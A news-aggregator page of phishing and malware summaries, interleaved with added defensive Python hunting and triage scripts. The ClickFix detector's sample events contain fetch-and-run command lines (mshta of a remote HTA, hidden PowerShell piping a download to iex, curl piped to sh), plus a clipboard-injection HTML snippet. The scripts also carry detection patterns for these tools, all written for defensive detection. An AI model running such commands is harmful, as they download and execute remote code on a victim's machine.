
All news with #phishing tag

616 articles · page 8 of 31

Storm-2561 Uses SEO Poisoning to Distribute Trojan VPNs

🔒 Microsoft disclosed a credential-theft campaign that uses SEO poisoning to push trojanized VPN clients impersonating legitimate enterprise software. Attackers hosted ZIPs on GitHub containing MSI installers that sideload malicious DLLs and deploy a Hyrax variant, presenting a fake sign-in dialog to harvest VPN credentials. Microsoft removed the repositories and revoked the signing certificate; organizations should enable MFA and verify software sources.

Global Police Sinkhole 45,000 IPs in Cybercrime Sweep

🔍 An Interpol-led operation, Operation Synergia III, sinkholed tens of thousands of IP addresses and seized servers linked to global cybercrime between July 2025 and January 2026. Authorities from 72 countries made 94 arrests and seized 212 electronic devices, disrupting thousands of phishing and fraud sites including a large 33,000-site network identified in Macau. The action builds on earlier Synergia efforts and highlights the importance of international cooperation and private-sector partnerships to dismantle criminal infrastructures.

Storm-2561 Hijacks Search Results to Serve Trojan VPNs

🔍 Microsoft warns that the cybercriminal group Storm-2561 is poisoning search results to distribute trojanized VPN clients that harvest corporate credentials. The campaign redirects victims to digitally signed malware hosted on GitHub and then opens legitimate vendor sites to minimize detection. The installer side-loads malicious DLLs — including a variant of the Hyrax infostealer — to extract VPN credentials and achieve persistence via the RunOnce registry key. Microsoft recommends enforcing multifactor authentication, disabling browser password syncing on managed devices, and running endpoint detection and response in block mode with network and web protections enabled.

Loblaw Notifies Customers After Network Data Breach

🔒 Loblaw Companies Limited has detected an intrusion into a contained, non-critical portion of its IT network and confirmed that a criminal third party accessed basic customer information. The exposed data includes names, phone numbers, and email addresses, which could be used for phishing and fraud. Loblaw says there is no evidence that financial information, health data, or account passwords were compromised and that PC Financial has not been impacted. The company has automatically logged customers out, urges users to sign in again and change passwords, and continues to investigate.

Storm-2561 SEO poisoning distributes fake VPN clients

🔒 Microsoft Threat Intelligence attributes a mid‑January 2026 credential theft campaign to the cybercriminal group Storm‑2561, which used SEO poisoning to surface malicious ZIP files masquerading as legitimate enterprise VPN installers. The ZIPs contained an MSI that side‑loaded signed trojan DLLs (dwmapi.dll and inspector.dll) which harvested VPN credentials and exfiltrated configuration data to attacker infrastructure. The binaries were signed with a certificate issued to Taiyuan Lihua Near Information Technology Co., Ltd. (now revoked), and the installers mimicked a Pulse Secure client to trick users; GitHub hosts were used but have been removed.
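Two hunting checks for the tradecraft the three Storm-2561 items above describe, written here as an added example (not Microsoft's or the page's code): a DLL that belongs in System32 (dwmapi.dll, named in the report) dropped beside an application binary for side-loading, and a RunOnce value that launches from a user-writable path. The file list and registry entries are constructed; the extra DLL names and the user-writable path markers are assumptions a hunter would tune.

```python
"""Side-load and RunOnce hunting over constructed sample data (added example)."""
from pathlib import PureWindowsPath

# dwmapi.dll is named in the report; the other names are assumptions listed as
# common side-loading targets that belong in System32, not in an app folder.
SYSTEM_DLLS = {"dwmapi.dll", "version.dll", "dbghelp.dll", "cryptbase.dll", "wtsapi32.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64", "c:\\windows\\winsxs")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\programdata\\", "\\users\\public\\")
RUNONCE_KEYS = {
    "hkcu\\software\\microsoft\\windows\\currentversion\\runonce",
    "hklm\\software\\microsoft\\windows\\currentversion\\runonce",
}


def find_sideload_candidates(paths):
    """Return (dll_path, [exe names]) for each System32-named DLL that sits in a
    non-system directory next to at least one executable."""
    by_dir = {}
    for p in paths:
        wp = PureWindowsPath(p)
        by_dir.setdefault(str(wp.parent).lower(), []).append(wp.name.lower())
    hits = []
    for directory, names in by_dir.items():
        if directory.startswith(SYSTEM_DIRS):
            continue  # a system DLL in its home directory is expected
        exes = [n for n in names if n.endswith(".exe")]
        if not exes:
            continue
        for n in names:
            if n in SYSTEM_DLLS:
                hits.append((directory + "\\" + n, exes))
    return hits


def find_suspicious_runonce(entries):
    """entries: (key, value_name, command) tuples as read from the registry.
    Flags RunOnce values whose command runs from a user-writable location."""
    hits = []
    for key, value_name, command in entries:
        if key.lower() not in RUNONCE_KEYS:
            continue
        if any(marker in command.lower() for marker in USER_WRITABLE):
            hits.append((key, value_name, command))
    return hits


# Constructed sample: an MSI-dropped "VPN client" in %TEMP% with dwmapi.dll
# beside it, plus a RunOnce value pointing back at it.
SAMPLE_FILES = [
    r"C:\Users\alice\AppData\Local\Temp\PulseSecure\PulseSecure.exe",
    r"C:\Users\alice\AppData\Local\Temp\PulseSecure\dwmapi.dll",
    r"C:\Users\alice\AppData\Local\Temp\PulseSecure\inspector.dll",
    r"C:\Windows\System32\dwmapi.dll",
    r"C:\Program Files\7-Zip\7z.exe",
    r"C:\Program Files\7-Zip\7z.dll",
]
SAMPLE_RUNONCE = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce", "Inspector",
     r"C:\Users\alice\AppData\Local\Temp\PulseSecure\PulseSecure.exe"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce", "VendorCleanup",
     r"C:\Program Files\Vendor\cleanup.exe /silent"),
]

if __name__ == "__main__":
    for dll, exes in find_sideload_candidates(SAMPLE_FILES):
        print("side-load candidate:", dll, "next to", exes)
    for key, name, cmd in find_suspicious_runonce(SAMPLE_RUNONCE):
        print("RunOnce from user-writable path:", name, "=>", cmd)
```

On a live host the inputs would come from a file-system walk and a registry export; the signed-but-revoked certificate in the report is a reminder that signature validity alone does not clear a DLL found in this position.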

Fake AI Agent Ads Deliver AMOS and Amatera Infostealers

🔒 Kaspersky researchers uncovered malicious Google Search ads that mimic documentation for popular AI assistants (for example, Claude Code, OpenClaw and Doubao) to trick users into running installer commands. The fake guides prompt victims to execute commands that deploy AMOS on macOS (via curl) or the Amatera infostealer on Windows (via mshta.exe), which exfiltrates browser data, crypto-wallets and files to a remote server. Organizations should warn staff, centrally manage access to AI tools and maintain endpoint protections.

Scaling Phishing Detection for Modern Enterprise SOCs

🔐 Modern phishing increasingly hides behind legitimate infrastructure and encrypted HTTPS, making static checks insufficient. The piece recommends a three-part investigation model — safe interaction, automation, and in-sandbox SSL decryption — so SOCs can observe full attack flows, extract actionable IOCs, and reach evidence-based verdicts quickly. This approach reduces analyst load and helps detect identity-driven compromise earlier.

Signal Accounts Hijacked via Social Engineering, Says Report

🔒 Signal has confirmed that attackers have hijacked some user accounts by tricking victims into handing over verification codes or linking a second device. The company says its encryption and central infrastructure remain uncompromised and that the campaign relies on social engineering rather than exploiting software vulnerabilities. Targeted users received in-app messages purporting to be a "Signal Security Support Chatbot" or were sent QR codes and links that secretly link an attacker’s device. Review Settings > Linked Devices and never share verification codes or your PIN.

Attackers Weaponize SOC Workloads to Exploit Phishing

🛡️ Attackers increasingly treat high-volume phishing as a weapon, flooding Security Operations Centers to exhaust analysts and hide targeted spear-phish. The article argues defenders must move from rule-based automation to decision-ready investigations—transparent, auditable agentic AI that produces concise verdicts and evidence. This reduces analyst fatigue, restores rapid response, and limits the window for attacker success.

Resumes with Malicious ISO Attachments Target HR Teams

📄 Researchers at Aryaka report a campaign distributing malicious resumés with ISO attachments to HR teams. When mounted, an included .lnk executes obfuscated PowerShell that extracts payloads from steganographic images and sideloads a DLL via a signed app. The malware includes a module called BlackSanta and leverages a BYOVD technique to disable EDR. Organizations should restrict resume formats and harden HR processes.
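A mail-gateway check for the HR lure above, added here as an example (not Aryaka's code): it flags container and shortcut attachments by extension and, so that a renamed image is still caught, by file magic (the ISO 9660 volume descriptor "CD001" at offset 0x8001, and the LNK header size plus CLSID). The message is constructed, and the blocked-extension list is an assumed policy.

```python
"""Attachment triage for ISO/LNK lures over a constructed message (added example)."""
import os
import email
import email.policy
from email.message import EmailMessage

BLOCKED_EXT = {".iso", ".img", ".vhd", ".vhdx", ".lnk", ".hta", ".js"}  # assumed policy
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}, little-endian


def sniff(data):
    """Identify ISO 9660 images (volume descriptor 'CD001' at 0x8001) and
    Windows shortcuts (header size 0x4C followed by the LNK CLSID)."""
    if len(data) >= 0x8006 and data[0x8001:0x8006] == b"CD001":
        return "iso9660"
    if data[:4] == b"\x4c\x00\x00\x00" and data[4:20] == LNK_CLSID:
        return "lnk"
    return None


def triage_attachments(raw_message):
    """Return (filename, extension, sniffed_type) for every attachment that is
    either a blocked extension or sniffs as a container/shortcut."""
    msg = email.message_from_bytes(raw_message, policy=email.policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        data = part.get_payload(decode=True) or b""
        ext = os.path.splitext(name.lower())[1]
        kind = sniff(data)
        if ext in BLOCKED_EXT or kind is not None:
            findings.append((name, ext, kind))
    return findings


def build_sample_message():
    """Constructed 'resume' e-mail: a minimal ISO 9660 image renamed to .pdf,
    plus a harmless PDF cover letter."""
    msg = EmailMessage()
    msg["From"] = "candidate@example.com"
    msg["To"] = "hr@example.com"
    msg["Subject"] = "Application - Senior Analyst"
    msg.set_content("Please find my resume attached.")
    iso = bytearray(0x8010)  # blank sectors carrying only the descriptor signature
    iso[0x8001:0x8006] = b"CD001"
    msg.add_attachment(bytes(iso), maintype="application", subtype="octet-stream",
                       filename="Resume_J_Doe.pdf")
    msg.add_attachment(b"%PDF-1.4\n%constructed cover letter\n", maintype="application",
                       subtype="pdf", filename="cover_letter.pdf")
    return msg.as_bytes()


if __name__ == "__main__":
    for name, ext, kind in triage_attachments(build_sample_message()):
        print(f"quarantine: {name!r} ext={ext} sniffed={kind}")
```

Restricting resume formats at the gateway is cheaper than relying on users not to mount an image; the magic check is what makes that restriction hold when the attacker renames the file.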

Contagious Interview Campaign: Malware via Fake Interviews

🔒 Microsoft Defender Experts describe the Contagious Interview campaign, a long-running social engineering operation that delivers malware through staged developer recruitment processes. Threat actors pose as recruiters and persuade victims to clone and execute NPM packages or to trust repository tasks in Visual Studio Code that then fetch backdoors such as Invisible Ferret and FlexibleFerret. The operation targets developer endpoints, source-control credentials, and CI/CD access by weaponizing trusted hiring workflows. Microsoft recommends isolating coding tests, pre-reviewing recruiter repositories, restricting runtimes, protecting secrets, and hunting for editor-to-shell execution chains.
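A pre-review scanner for a recruiter-supplied repository, matching the "pre-review recruiter repositories" advice above; added example, not Microsoft's tooling. It reports npm lifecycle scripts that run on `npm install` and VS Code tasks configured with `"runOn": "folderOpen"`, which execute once the workspace is trusted. The sample repository is constructed in a temporary directory, and the lifecycle hook list is an assumption covering the common hooks.

```python
"""Recruiter-repo pre-review: auto-run npm hooks and VS Code tasks (added example)."""
import json
import tempfile
from pathlib import Path

# npm runs these hooks without being asked (assumed list of the common ones).
NPM_LIFECYCLE = {"preinstall", "install", "postinstall", "prepare",
                 "preuninstall", "postuninstall"}


def load_jsonc(path):
    """tasks.json may contain // line comments; strip whole-line comments only."""
    text = "\n".join(line for line in path.read_text().splitlines()
                     if not line.strip().startswith("//"))
    return json.loads(text)


def scan_repo(root):
    """Return (kind, name, command) for every auto-executing hook found."""
    root = Path(root)
    findings = []
    pkg = root / "package.json"
    if pkg.exists():
        scripts = json.loads(pkg.read_text()).get("scripts") or {}
        for hook, cmd in scripts.items():
            if hook in NPM_LIFECYCLE:
                findings.append(("npm-lifecycle", hook, cmd))
    tasks = root / ".vscode" / "tasks.json"
    if tasks.exists():
        for task in load_jsonc(tasks).get("tasks", []):
            if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
                findings.append(("vscode-auto-task", task.get("label"), task.get("command")))
    return findings


def build_sample_repo():
    """Constructed 'coding test' repo with one hook of each kind."""
    d = Path(tempfile.mkdtemp(prefix="coding-test-"))
    (d / "package.json").write_text(json.dumps({
        "name": "coding-test",
        "scripts": {"postinstall": "node setup.js", "test": "jest"},
    }))
    (d / ".vscode").mkdir()
    (d / ".vscode" / "tasks.json").write_text(
        '{\n  // "prepare the environment"\n  "version": "2.0.0",\n'
        '  "tasks": [{"label": "Prepare env", "type": "shell",\n'
        '             "command": "node .vscode/setup.js",\n'
        '             "runOptions": {"runOn": "folderOpen"}}]\n}\n')
    return d


if __name__ == "__main__":
    for kind, name, cmd in scan_repo(build_sample_repo()):
        print(f"{kind}: {name} -> {cmd}")
```

Run it before opening the folder in an editor or running `npm install`; a clean scan does not prove the repository is safe, but either finding is enough to move the exercise into an isolated VM with no credentials on it.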

WordPress sites abused to deliver ClickFix infostealers

🔒 Rapid7 has identified a widespread campaign that compromises legitimate WordPress websites to infect visitors with infostealer malware. Attackers display a convincing fake Cloudflare CAPTCHA and use the ClickFix social‑engineering trick to prompt victims to paste commands into Windows Run, initiating staged downloads. Observed payloads include Vidar, Impure, Vodka and Double Donut. Site administrators are urged to update components, enable MFA, use strong passwords and avoid executing untrusted code on credential-bearing devices.
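Detection logic for the paste-and-run lures in the two items above (the fake Cloudflare CAPTCHA on compromised WordPress sites, and the fake AI-assistant install guides that run `mshta.exe` or `curl`), added here as an example and not Rapid7's or Kaspersky's code. It does two things: it scores process-creation events where a command launched from the Windows Run dialog (parent `explorer.exe`, an assumption about how Win+R launches) or a terminal fetches remote content, and it scans page source for the clipboard-write-plus-command pattern. The event schema and the events and HTML are constructed.

```python
"""ClickFix / paste-and-run detection over constructed events and HTML (added example)."""
import re

WIN_LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "curl.exe", "wscript.exe"}
URL = re.compile(r"https?://", re.I)
PS_FLAGS = re.compile(r"(-enc\w*|-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|downloadstring)", re.I)
CURL_PIPE_SH = re.compile(r"curl\b.*\|\s*(ba|z)?sh\b", re.I)


def triage_process_event(ev):
    """Return the reasons an event looks like a paste-and-run lure (empty if none)."""
    image = ev["image"].lower()
    parent = ev["parent"].lower()
    cmd = ev["cmdline"]
    reasons = []
    # Win+R commands are spawned by explorer.exe (assumption); a LOLBin started
    # that way with a URL on its command line is the ClickFix signature.
    if parent == "explorer.exe" and image in WIN_LOLBINS and URL.search(cmd):
        reasons.append("run-dialog launch fetching remote content")
    if image == "mshta.exe" and URL.search(cmd):
        reasons.append("mshta executing remote HTA")
    if image in {"powershell.exe", "pwsh.exe"} and PS_FLAGS.search(cmd) and URL.search(cmd):
        reasons.append("powershell download-and-execute")
    if image in {"sh", "bash", "zsh"} and CURL_PIPE_SH.search(cmd):
        reasons.append("curl piped to shell")  # the macOS AMOS path
    return reasons


def triage_process_events(events):
    out = []
    for ev in events:
        reasons = triage_process_event(ev)
        if reasons:
            out.append((ev["id"], reasons))
    return out


CLIPBOARD_WRITE = re.compile(r"navigator\.clipboard\.writeText\s*\(|execCommand\(\s*['\"]copy['\"]", re.I)
COMMAND_WORDS = re.compile(r"(powershell|mshta|cmd\s*/c|curl\s+-|\biex\b)", re.I)


def page_has_clickfix(html):
    """True when a page both writes to the clipboard and contains a shell command."""
    return bool(CLIPBOARD_WRITE.search(html) and COMMAND_WORDS.search(html))


SAMPLE_EVENTS = [  # constructed EDR-style process-creation events
    {"id": 1, "parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta https://cdn.example.net/verify.hta"},
    {"id": 2, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://example.org/a.ps1 | iex"'},
    {"id": 3, "parent": "Terminal", "image": "zsh",
     "cmdline": "curl -fsSL https://example.org/install.sh | sh"},
    {"id": 4, "parent": "Code.exe", "image": "powershell.exe",
     "cmdline": "powershell -File build.ps1"},
    {"id": 5, "parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad"},
]
SAMPLE_HTML = """<div class="cf-box">Verify you are human: press Win+R, then Ctrl+V, then Enter</div>
<script>navigator.clipboard.writeText("powershell -w hidden -c iwr https://example.org/x|iex");</script>"""

if __name__ == "__main__":
    for event_id, reasons in triage_process_events(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(reasons)}")
    print("page looks like ClickFix:", page_has_clickfix(SAMPLE_HTML))
```

The host-side rules catch the payload regardless of which site delivered it; the page-side check is the one a WordPress administrator can run against their own templates and injected scripts after the component updates the item recommends.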

Augmented Phishing and Social Engineering in the AI Era

🤖 GenAI has accelerated social engineering and phishing, allowing attackers to produce hyper-personalized messages, convincingly cloned executive voices, and realistic video impersonations in seconds. Deepfake incidents have shifted from online curiosity to tangible business risk, causing financial loss and operational disruption while making identity verification on everyday collaboration platforms increasingly difficult. To address these threats, Check Point Services has expanded its training portfolio and advocates for modern defenses and smarter awareness programs designed for the realities of the AI era.

ESET Threat Intelligence Emerges as Strategic Game-Changer

🔍 ESET positions its threat intelligence and telemetry as essential tools for organizations facing increasingly sophisticated cyber threats, including AI-enabled attacks and convincing deepfakes. ESET Telemetry reports a 12% decline in overall detections in India (Jan–Aug 2025), but ransomware surged 70% from H2 2024 to H1 2025 and phishing remains the most common vector. The vendor bundles endpoint, XDR, identity protection, MDR, and analyst-driven APT reporting to help CIOs and CISOs stay ahead.

Threat Actor Abuses .arpa Reverse DNS to Evade Detection

🛡️ Infoblox reports a novel phishing evasion technique that leverages the .arpa reverse-DNS namespace and IPv6-to-IPv4 tunneling to host malicious content on infrastructure-only names. The actor created forward A/AAAA records for reverse DNS names—using services tied to Hurricane Electric and Cloudflare—so links appear to originate from trusted infrastructure, bypassing reputation checks and many security controls. Clicks redirected victims to credential- and payment-stealing landing pages. Infoblox recommends audits, DNS restrictions, and targeted detection for ip6.arpa traffic.

Microsoft Teams Phishing Deploys A0Backdoor via Quick Assist

🔐 Researchers at BlueVoyant describe a Microsoft Teams phishing campaign that social-engineers employees into initiating Quick Assist remote sessions to install a newly observed backdoor, A0Backdoor. Attackers deliver digitally signed MSI installers and use DLL sideloading with legitimate Microsoft binaries to load a malicious hostfxr.dll that decrypts and runs shellcode. The backdoor fingerprints hosts, communicates with command-and-control over DNS MX queries with encoded subdomains, and has been observed targeting financial and healthcare organizations.
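One DNS-log pass serving both the .arpa item and the A0Backdoor item above, added as an example rather than Infoblox's or BlueVoyant's detection content: it flags forward (A/AAAA) lookups of names that live under `.in-addr.arpa` or `.ip6.arpa`, which should only ever be asked for with PTR, and MX queries whose labels below the registered domain are long and high-entropy, the shape of encoded C2 data. The log format (timestamp, client, qtype, qname), the entropy threshold and the log lines themselves are constructed assumptions.

```python
"""DNS-log checks: forward lookups of reverse names, encoded MX queries (added example)."""
import math
from collections import Counter
from urllib.parse import urlsplit

REVERSE_SUFFIXES = (".in-addr.arpa", ".ip6.arpa")


def shannon_entropy(s):
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def is_forward_lookup_of_reverse_name(qtype, qname):
    """A/AAAA/HTTPS queries for a name under the reverse namespace: the actor
    published forward records there so links resolve like ordinary hosts."""
    name = qname.lower().rstrip(".")
    return qtype.upper() in {"A", "AAAA", "HTTPS"} and name.endswith(REVERSE_SUFFIXES)


def looks_like_encoded_mx(qname, min_len=24, min_entropy=3.5):
    """MX queries normally target a short hostname; long, high-entropy labels
    below the registered domain suggest data smuggled in the name."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) < 4:
        return False
    encoded = "".join(labels[:-2])  # everything below the registered domain (approximation)
    return len(encoded) >= min_len and shannon_entropy(encoded) >= min_entropy


def url_points_into_arpa(url):
    """Link check for mail or proxy logs: a click target whose host is a reverse name."""
    host = (urlsplit(url).hostname or "").lower()
    return host.endswith(REVERSE_SUFFIXES)


def analyze(log_lines):
    findings = {"arpa_forward": [], "mx_c2": []}
    for line in log_lines:
        parts = line.split()
        if len(parts) != 4:
            continue
        _ts, client, qtype, qname = parts
        if is_forward_lookup_of_reverse_name(qtype, qname):
            findings["arpa_forward"].append((client, qname))
        if qtype.upper() == "MX" and looks_like_encoded_mx(qname):
            findings["mx_c2"].append((client, qname))
    return findings


SAMPLE_LOG = """\
2026-02-10T10:01:02Z 10.0.0.5 A www.example.com
2026-02-10T10:01:03Z 10.0.0.5 PTR 4.3.2.1.in-addr.arpa
2026-02-10T10:01:05Z 10.0.0.7 AAAA secure-login.8.b.d.0.1.0.0.2.ip6.arpa
2026-02-10T10:01:06Z 10.0.0.9 MX mail.example.com
2026-02-10T10:01:07Z 10.0.0.9 MX 6a3f9c1e0b7d4a2f8e1c.5d9b3a7f2c4e.cdn-updates.example
2026-02-10T10:01:09Z 10.0.0.9 MX 9b2e7f0c4d1a8e3f6c5b.a7d2e9f14c03.cdn-updates.example
""".splitlines()  # constructed resolver log

if __name__ == "__main__":
    for category, hits in analyze(SAMPLE_LOG).items():
        for client, qname in hits:
            print(f"{category}: {client} asked for {qname}")
```

The PTR line is the legitimate use of the reverse tree and is left alone; the entropy rule will also fire on some CDN or anti-spam hostnames, so in practice it is paired with a per-client count of distinct MX names under one domain, which a backdoor beaconing over MX drives up quickly.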

Dutch govt warns of Signal and WhatsApp hijacking campaigns

🔐 Russian state-sponsored actors are tied to a targeted phishing campaign that hijacks Signal and WhatsApp accounts to monitor messages of government officials, military personnel, and journalists. The Dutch MIVD and AIVD warn attackers use fake support chats, SMS verification-code prompts, Signal PIN requests, and malicious QR links to link attacker devices. Signal says its infrastructure is intact and urges users never to share codes or PINs and to review linked devices immediately.

FBI: Phishing Scam Targets City and County Permit Applicants

⚠️ The FBI warns that criminals are impersonating city and county planning and zoning officials to phish businesses and individuals with active land-use or permit applications. Victims receive emails referencing permit details, zoning application numbers, or property addresses and are instructed to pay invoices via wire transfers, peer-to-peer platforms, or cryptocurrency, often pressured with urgency. The agency urges recipients to verify sender domains, call local government offices to confirm fees, and report incidents to the IC3.

UK launches Online Crime Centre to tackle cyber fraud

🔒 The UK government will establish an Online Crime Centre in April to disrupt large-scale cyber-enabled fraud by combining expertise from government, intelligence agencies, police, banks, mobile networks and major tech firms. The centre will identify and shut down scam accounts, websites and phone numbers, block scam texts, freeze criminal accounts and target overseas scam compounds. The strategy also plans to deploy AI for fraud detection and scam-baiting chatbots to gather intelligence, while introducing a new fraud victims charter to standardise support and reimbursements.

Ghanaian Pleads Guilty in $100M Romance and BEC Scam

🔒 A Ghanaian national, Derrick Van Yeboah, has pleaded guilty to conspiracy in a global fraud ring blamed for over $100 million in victim losses. Prosecutors say Van Yeboah impersonated romantic partners and corporate leaders to induce victims and orchestrated laundering of stolen funds, accounting for roughly 10% of the operation's take. He faces up to 20 years in prison and agreed to $10.1m in restitution and forfeiture; his plea follows extradition and indictment last year.